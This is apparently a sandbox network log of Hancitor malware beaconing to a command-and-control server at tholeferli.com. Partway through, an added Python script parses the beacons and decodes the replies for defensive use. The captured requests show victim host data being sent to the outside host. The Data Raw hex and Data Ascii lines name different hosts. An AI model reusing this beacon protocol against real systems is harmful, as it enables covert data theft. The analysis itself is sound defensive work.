                                                Jul 22, 2021 16:12:16.147488117 CEST | 456 | OUT | POST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:12:16.313445091 CEST | 456 | IN | HTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:12:16 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 41 56 45 5a 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cAVEZARRABw==0


                                                Session ID: 144 | Source IP: 192.168.2.22 | Source Port: 49311 | Destination IP: 194.147.115.74 | Destination Port: 80 | Process: C:\Windows\SysWOW64\rundll32.exe
                                                Timestamp | kBytes transferred | Direction | Data
                                                Jul 22, 2021 16:12:16.594722986 CEST | 457 | OUT | POST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:12:16.777502060 CEST | 457 | IN | HTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:12:16 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 46 59 42 55 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cFYBUARRABw==0


                                                Session ID: 145 | Source IP: 192.168.2.22 | Source Port: 49312 | Destination IP: 194.147.115.74 | Destination Port: 80 | Process: C:\Windows\SysWOW64\rundll32.exe
                                                Timestamp | kBytes transferred | Direction | Data
                                                Jul 22, 2021 16:12:17.064452887 CEST | 458 | OUT | POST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:12:17.231761932 CEST | 458 | IN | HTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:12:17 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 51 41 5a 4a 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cQAZJARRABw==0


                                                Session ID: 146 | Source IP: 192.168.2.22 | Source Port: 49313 | Destination IP: 194.147.115.74 | Destination Port: 80 | Process: C:\Windows\SysWOW64\rundll32.exe
                                                Timestamp | kBytes transferred | Direction | Data
                                                Jul 22, 2021 16:12:17.513257980 CEST | 459 | OUT | POST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:12:17.669996977 CEST | 459 | IN | HTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:12:17 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 4d 56 45 4e 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cMVENARRABw==0


                                                Session ID: 147 | Source IP: 192.168.2.22 | Source Port: 49314 | Destination IP: 194.147.115.74 | Destination Port: 80 | Process: C:\Windows\SysWOW64\rundll32.exe
                                                Timestamp | kBytes transferred | Direction | Data
                                                Jul 22, 2021 16:12:17.960793972 CEST | 460 | OUT | POST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:12:18.116715908 CEST | 460 | IN | HTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:12:17 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 5a 41 5a 41 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cZAZAARRABw==0


                                                Session ID: 148 | Source IP: 192.168.2.22 | Source Port: 49315 | Destination IP: 194.147.115.74 | Destination Port: 80 | Process: C:\Windows\SysWOW64\rundll32.exe
                                                Timestamp | kBytes transferred | Direction | Data
                                                Jul 22, 2021 16:12:18.387399912 CEST | 461 | OUT | POST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:12:18.543351889 CEST | 461 | IN | HTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:12:18 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 54 48 53 47 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cTHSGARRABw==0


                                                Session ID: 149 | Source IP: 192.168.2.22 | Source Port: 49316 | Destination IP: 194.147.115.74 | Destination Port: 80 | Process: C:\Windows\SysWOW64\rundll32.exe
                                                Timestamp | kBytes transferred | Direction | Data
                                                Jul 22, 2021 16:12:18.980448008 CEST | 462 | OUT | POST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:12:19.136413097 CEST | 463 | IN | HTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:12:19 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 5a 42 59 41 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cZBYAARRABw==0


                                                Session ID: 15 | Source IP: 192.168.2.22 | Source Port: 49182 | Destination IP: 194.147.115.74 | Destination Port: 80 | Process: C:\Windows\SysWOW64\rundll32.exe
                                                Timestamp | kBytes transferred | Direction | Data
                                                Jul 22, 2021 16:11:09.646503925 CEST | 312 | OUT | POST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:11:09.817370892 CEST | 312 | IN | HTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:11:09 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 54 5a 41 47 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cTZAGARRABw==0


                                                Session ID: 150 | Source IP: 192.168.2.22 | Source Port: 49317 | Destination IP: 194.147.115.74 | Destination Port: 80 | Process: C:\Windows\SysWOW64\rundll32.exe
                                                Timestamp | kBytes transferred | Direction | Data
                                                Jul 22, 2021 16:12:19.737467051 CEST | 463 | OUT | POST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:12:19.904759884 CEST | 464 | IN | HTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:12:19 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 48 5a 41 53 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cHZASARRABw==0
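The sessions above are the Hancitor check-in loop: the injected rundll32.exe POSTs a fixed set of form fields (GUID, BUILD, INFO, EXT, IP, TYPE, WIN) to /8/forum.php on tholeferli.com and receives a short chunked body containing one base64 string. The Python below is an added example, not part of this report or of the sandbox's tooling. It parses the beacon fields, reassembles the chunked reply and base64-decodes it. The single-byte XOR key 0x7A applied to the decoded bytes is an assumption taken from public Hancitor analyses, not something this page states; under that assumption every reply shown here ends in an empty "n" task, {n:}, which is also how you can sanity-check the key against your own capture. The sample inputs are constructed from the Data Ascii and Data Raw lines above, keeping the report's sanitized hostname.

```python
"""Parse a Hancitor-style check-in and its C2 reply (added example)."""
import base64
import re
from typing import Dict, List, Optional, Tuple

# Form fields present, in this order, in every beacon on this page.
BEACON_FIELDS = ("GUID", "BUILD", "INFO", "EXT", "IP", "TYPE", "WIN")
# Every beacon here is a POST to /<number>/forum.php.
BEACON_PATH = re.compile(r"^/\d+/forum\.php$")
# ASSUMPTION (from public Hancitor analyses, not stated in this report):
# the base64-decoded reply is XORed with the single byte 0x7A.
XOR_KEY = 0x7A
# Tasks in a decoded reply look like {letter:argument}.
TASK_RE = re.compile(rb"\{([a-z]):([^}]*)\}")

# Constructed sample input: request body copied from the Data Ascii line of session 150.
SAMPLE_BODY = ("GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\\user"
               "&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)")
# Constructed sample input: raw reply bodies (Data Raw) of three sessions on this page.
SAMPLE_REPLIES = [
    bytes.fromhex("63 0d 0a 54 5a 41 47 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a"),
    bytes.fromhex("63 0d 0a 48 5a 41 53 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a"),
    bytes.fromhex("63 0d 0a 5a 46 55 41 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a"),
]


def parse_beacon(body: str) -> Optional[Dict[str, str]]:
    """Split the form body and accept it only if the key set and key order
    match the Hancitor beacon; returns None for anything else."""
    fields: Dict[str, str] = {}
    for pair in body.split("&"):
        key, sep, value = pair.partition("=")
        if not sep:
            return None
        fields[key] = value
    if tuple(fields) != BEACON_FIELDS:
        return None
    return fields


def is_beacon(method: str, path: str, body: str) -> bool:
    """Detection predicate: POST to /<n>/forum.php carrying the seven beacon fields."""
    return method == "POST" and bool(BEACON_PATH.match(path)) and parse_beacon(body) is not None


def dechunk(raw: bytes) -> bytes:
    """Reassemble an HTTP/1.1 chunked body: hex size, CRLF, data, CRLF, ..., a 0 chunk."""
    out = bytearray()
    pos = 0
    while True:
        end = raw.index(b"\r\n", pos)
        size = int(raw[pos:end].split(b";")[0], 16)  # drop any chunk extension
        if size == 0:
            return bytes(out)
        pos = end + 2
        out += raw[pos:pos + size]
        pos += size + 2  # skip the CRLF that closes the chunk


def decode_reply(raw: bytes) -> bytes:
    """Dechunk, base64-decode and de-XOR a C2 reply (XOR key is the assumption above)."""
    b64 = dechunk(raw)
    return bytes(b ^ XOR_KEY for b in base64.b64decode(b64, validate=True))


def extract_tasks(decoded: bytes) -> List[Tuple[str, str]]:
    """Return the {letter:argument} tasks in a decoded reply; the bytes before
    the first '{' differ in every reply on this page and are ignored."""
    return [(c.decode(), a.decode(errors="replace")) for c, a in TASK_RE.findall(decoded)]


def summarize(body: str, raw_reply: bytes) -> Dict[str, object]:
    """One record per beacon/reply pair, the shape you would log or alert on."""
    fields = parse_beacon(body) or {}
    decoded = decode_reply(raw_reply)
    return {
        "guid": fields.get("GUID"),
        "build": fields.get("BUILD"),
        "victim_ip": fields.get("IP"),
        "decoded_len": len(decoded),
        "tasks": extract_tasks(decoded),
    }


if __name__ == "__main__":
    for reply in SAMPLE_REPLIES:
        print(summarize(SAMPLE_BODY, reply))
```

Run as-is to see one record per sample reply; feed `is_beacon` the method, path and body of each POST from a proxy log to flag further check-ins with the same field layout, regardless of the numeric path prefix or hostname.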


                                                Session ID: 151 | Source IP: 192.168.2.22 | Source Port: 49318 | Destination IP: 194.147.115.74 | Destination Port: 80 | Process: C:\Windows\SysWOW64\rundll32.exe
                                                Timestamp | kBytes transferred | Direction | Data
                                                Jul 22, 2021 16:12:20.199851990 CEST | 465 | OUT | POST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:12:20.367650032 CEST | 465 | IN | HTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:12:20 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 5a 46 55 41 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cZFUAARRABw==0


                                                Session ID: 152 | Source IP: 192.168.2.22 | Source Port: 49319 | Destination IP: 194.147.115.74 | Destination Port: 80 | Process: C:\Windows\SysWOW64\rundll32.exe
                                                Timestamp | kBytes transferred | Direction | Data
                                                Jul 22, 2021 16:12:20.678678036 CEST | 466 | OUT | POST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:12:20.848067045 CEST | 466 | IN | HTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:12:20 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 41 41 5a 5a 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cAAZZARRABw==0


                                                Session ID: 153 | Source IP: 192.168.2.22 | Source Port: 49320 | Destination IP: 194.147.115.74 | Destination Port: 80 | Process: C:\Windows\SysWOW64\rundll32.exe
                                                Timestamp | kBytes transferred | Direction | Data
                                                Jul 22, 2021 16:12:21.566584110 CEST | 467 | OUT | POST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:12:21.733494997 CEST | 467 | IN | HTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:12:21 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 42 4e 4d 59 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cBNMYARRABw==0


                                                Session ID: 154 | Source IP: 192.168.2.22 | Source Port: 49321 | Destination IP: 194.147.115.74 | Destination Port: 80 | Process: C:\Windows\SysWOW64\rundll32.exe
                                                Timestamp | kBytes transferred | Direction | Data
                                                Jul 22, 2021 16:12:22.008101940 CEST | 468 | OUT | POST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:12:23.167417049 CEST | 468 | IN | HTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:12:23 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 4a 4b 50 51 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cJKPQARRABw==0


                                                Session ID: 155 | Source IP: 192.168.2.22 | Source Port: 49322 | Destination IP: 194.147.115.74 | Destination Port: 80 | Process: C:\Windows\SysWOW64\rundll32.exe
                                                Timestamp | kBytes transferred | Direction | Data
                                                Jul 22, 2021 16:12:23.446151018 CEST | 469 | OUT | POST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:12:23.613425970 CEST | 469 | IN | HTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:12:23 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 54 4b 50 47 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cTKPGARRABw==0


                                                Session ID: 156 | Source IP: 192.168.2.22 | Source Port: 49323 | Destination IP: 194.147.115.74 | Destination Port: 80 | Process: C:\Windows\SysWOW64\rundll32.exe
                                                Timestamp | kBytes transferred | Direction | Data
                                                Jul 22, 2021 16:12:23.913350105 CEST | 470 | OUT | POST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:12:24.082932949 CEST | 470 | IN | HTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:12:23 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
